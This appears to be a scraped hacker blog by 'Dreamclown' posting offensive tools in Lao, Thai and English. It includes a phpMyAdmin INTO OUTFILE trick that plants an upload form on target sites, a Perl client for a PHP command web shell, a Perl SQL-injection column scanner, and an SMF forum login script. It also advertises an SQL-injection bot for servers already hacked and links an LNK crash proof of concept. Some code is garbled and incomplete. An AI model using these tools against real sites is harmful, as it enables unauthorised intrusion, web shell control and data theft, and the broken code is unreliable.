Lnk Windows Shortcut Vulnerability p0c

This p0c is for Crash explorer.exe

http://laoupload.com/UP22PQL6DQFC/p0c.lnk.html

phpMyAdmin Pwn !!

This script is for automatic sql query in phpmyadmin to create upload form in your target site

SELECT 'upload form blah blah blah...' INTO OUTFILE 'C:/xampp/www/upload.php'

phpMyAdmin Remote Shell [ by Dreamclown]

Usage : .pl [site+pma path] [upload path] [user] [pass]


+Download Video+Perl Script+Perl Execution (Complied)
-Size : 5.44 MB

Perl Bot ສະແກນບັດ SQL Injection ​ເພື່ອ​ໃຊ້​ໃນ Server+VDO




bot ຕົວນີ້ເອົາໃວ້ໃຊ້ສຳຫຼັບທ່ານທີ່ແຮັກ server ມາ​ແລ້ວ (windows ​ເທົ່າ​ນັ້ນ) ​ແຕ່​ບໍ່​ຮູ້​ວ່າ​ສິ​ເອົາ​ໄວ້​ເຮັດ​ຫຍັງ ​ເຮົາ​ມີ bot ທີ່​ເອົາ​ໃວ້​ໃຫ້ scan sql injection ​​ໂດຍ​​ໃສ່ list ​ເວັບ​ໃຫ້​ມັນ​​ເພື່ອ​ໃຫ້​ມັນ​ແຮັກ​ຕາມ list ທີ່​ໃຫ​້ມາ​ນັ້ນ ກໍ່​ແລ້ວ ຈາກ​ນັ້ນ​ເຮົາ​ກໍ່​ໄປ​ເບີ່​ງຜົນ​ການສະ​ແກນ​ເວັບ​ທີ່​ມີ​ບັດ​ໃນ log ທີ່​ມັນ save ​ໃວ້

VDO ການ​ນຳ​ໃຊ້​​ແມ່ນ​ຢູ່​​ໃນ​ນີ້​ນຳ​ເລີຍ



ປລ. perl ຕົວ​ນີ້ complie ມາ​ກ່ອນ​ແລ້ວ :D ​ເລີ​ຍ​ເປັນ exe ​ເນາະ

+Watch VDO
+Download VDO
+Download Bot (Perl Complie :D)

Google Dork Finder v2.0 Release [by Dreamclown]



Version 1:
-Change time out as scan site
-Add Filter to


PS. Can't use Dork Ex. inurl,site,allinurl...

Version 1.5:
-Change background to Transparent
-Save To File
-Auto Rank
-Dork List

Version 2.0:
-Add 2 Tab
-Trim Link
-Transparent Mode
-Fix Error Buffer Overflow
-Add Clean Button


by Dreamclown [At] Laohacker[dot]com

+Download Here...!!

Perl SMF Login [by Dreamclown]

#!usr/bin/perl

use LWP::UserAgent;
use HTTP::Cookies;

login_smf("user","password","http://localhost/index.php");
while(1){
}

sub login_smf{
my $user = $_[0];
my $password = $_[1];
my $target = $_[2];

$host = "$target?action=login";
$agent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)';
$ua = LWP::UserAgent->new(agent => $agent,
timeout => 10
);
$res = $ua->get($host);
$phpses = get_setcookie($res->as_string());
$ua->default_header(
'Accept' => "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
'Accept-Charset' => "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
'Keep-Alive' => '115',
'Connection' => 'keep-alive',
'Referer' => "$target?PHPSESSID=" . $phpses . "action=login2",
'Cookie' => "PHPSESSID=$phpses"
);

$host = "$target?PHPSESSID=" . $phpses . "&action=login2";
$res = $ua->post($host,
[
'user' => $user,
'passwrd' => $password,
'cookieneverexp' => 'on',
'hash_passwrd' => ''
]
);
print "===========================================\n";
print "[+] Host : $target\n";
print "[+] Login in $user..\n";
print "[+] Pass in $password..\n";
$ct = $res->content();
$ua->default_header('Cookie' => set_cookie($res->as_string()));
$res = $ua->get($target);
if($res->content() =~m/$user/ig){
print "[+] Success...!\n";
}
else{print "[+] Failed..\n";}
}

sub get_setcookie{
my $var = $_[0];
if($var =~ /Set-Cookie: PHPSESSID=(.+);/){
return $1;
}
}

sub set_cookie{
my $var = $_[0];
my $phpses;
if($var =~m/Set-Cookie: ([^;]+);[^;]+/){
$smf = $1;
$var =~s/Set-Cookie: $1//ig;
}
if($var =~m/Set-Cookie: ([^;]+)/){
$phpses = $1;
}
return $phpses . "; " . $smf;
}

sub readFile{
my @var;
my ($file) = @_;
open FILE, "<:utf8", "$file" or die "[+] Can't open $file : $!"; while(){
my $line = $_;
$line =~ s/\r|\n//g;
next if (length($line) == 0);
push(@var,$line);
}
close FILE;
return(@var);
}

@edkung : มันติดมาอ่ะ หะหะ ของพี่เล็ก windows98se เขืยนน่ะ แถมให้เลย

[Perl] - Lyrics.pl

+ มาอีกแล้วคับท่านกับ perl ของผม มาครั้งนี้เป็น perl เอาใว้หาเนื้อเพลงหรือ lyrics
+ ມາອີກແລ້ວກັບ perl ຫາເນື້ອເພງຫລື lyrics

+ Download Here...!!!

use LWP::UserAgent;

my $ua = LWP::UserAgent->new(agent => 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)');
$ua->timeout(10);
print "\t\n[+] Song : ";
chomp($song = );
print "\n[+] $song\n";
$song =~s/\s/\+/ig;
my $target = "http://www.lyricstime.com/search/?q=$song&t=default";
$res = $ua->get($target);
$ct = $res->content();
if($ct =~m/
  • /ig)
    {
    $res = $ua->get("http://www.lyricstime.com/$1");
    $ct2 = $res->content();
    if($ct2 =~m/
  • Cmd Shell - Perl

    Watch Video you will know about this....
    img.laoupload.com | ບໍລິການ ອັບໂຫລດຮູບ ຝາກຮູບ ດາວໂຫລດຮູບ ເກັບຮູບ ສົ່ງຮູບ ຮັກສາຮູບ ຟຣີ!!!!
    +Perl Cmd Shell
    +PHP CMD
    +Download Video Here ..!

    #!usr/bin/perl
    
    use LWP::UserAgent;
    
    my $target = 'http://localhost/cmd.php?cmd=';
    $ua = LWP::UserAgent->new();
    print "dreamclown\@r00t# ";
    chomp($cmd = );
    while($cmd !~ "exit"){
       if($cmd =~ "cls"){
         system("cls");
       }
       else
       {
       $s = $target . $cmd;
       $res = $ua->get($s);
       $ct = $res->content();
       print $ct;
       }
       print "\ndreamclown\@r00t# ";
      chomp($cmd = );
    }
    

    [Perl] - Scan Column Part 2

    #!usr/bin/perl
    
    use LWP::UserAgent;
    
    print "\n\tScan Column => [ by Dreamclown ]\n\n";
    print "[+] Target : ";
    chomp($target=);
    if($target !~/^http:\/\//ig)
    {
     $target = "http://$target";
    }
    print "[+] Scan On $target\n";
    $browser = LWP::UserAgent->new();
    $browser->timeout(10);
    $order = "+order+by+";
    for($i=1;$i<50;$i++)
    {
      $target2 = "$target$order$i";
      $res = $browser->get($target2);
      $ct = $res->content();
      if($ct =~m/Warning/ig)
      {
       $i = $i - 1;
       print "[+] Column => $i\n";
       exit;
      }
    }
    

    + Download Source Code Here..!!

    Test Hightlight - Hello World.pl

    #!/usr/bin/perl
    $age = 26;
    @date = (8, 24, 70);
    
    system("cls");
    my $a = "Dreamclown";
    print $a;
    print "\nhello, world\n"; #newline
    print "hello, world\t";     #tap
    print "\nhello, world\b";    #backspace
    print "\nhello, world\a";     #alert 
    print "\nhello, world\e";      #ESC charecter
    print "\nhello, world\033";
    print "\nhello, world\x7f";     #DEL charecter
    print "\nhello, world\cC";      #CTRL-C
    print "\nhello, world\\";
    print "\nhello, world\"";     #double quote
    print "\nhello, worl\ud";   #upper
    print "\nhello, worl\lD";    #lowwer 
    print "\n\Uhello, world";   #all upper
    print "\n\LHELLO, WORLD";    #all lowwer
    print "\n\Qhello, world";
    print "\n\Uhello\E, world\n";     #End \U\L\Q
    print $age."\n";
    print $date[2] . "\n";
    
    %fruit = (
              apples => 3,
              oranges => 6
    );
    
    ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime();
    print $hour . ":" . $min . ":" . $sec . "\n";
    
    $now = localtime();
    print $now . "\n";
    
    if ($a = "Dreamclown"){
      print "OK";
    }
    else{
      print "Not OK";
    }
    
    unless ($a = "Dreamclown"){
      print "\nA";
    }
    else{
      print "\nB";
    }
    
    if ($a != "Dreamclown"){ print "\nThat's right..!";}
    elsif ($a = "Dreamclown"){ print "\nGood\n"; }
    
    $i = 1;
    while ($i < 10){
      print $i . "\n";
    }
    continue{
      $i++;
    }
    
    for($i = 1;$i < 11;$i++){
      print $i . "\n";
    }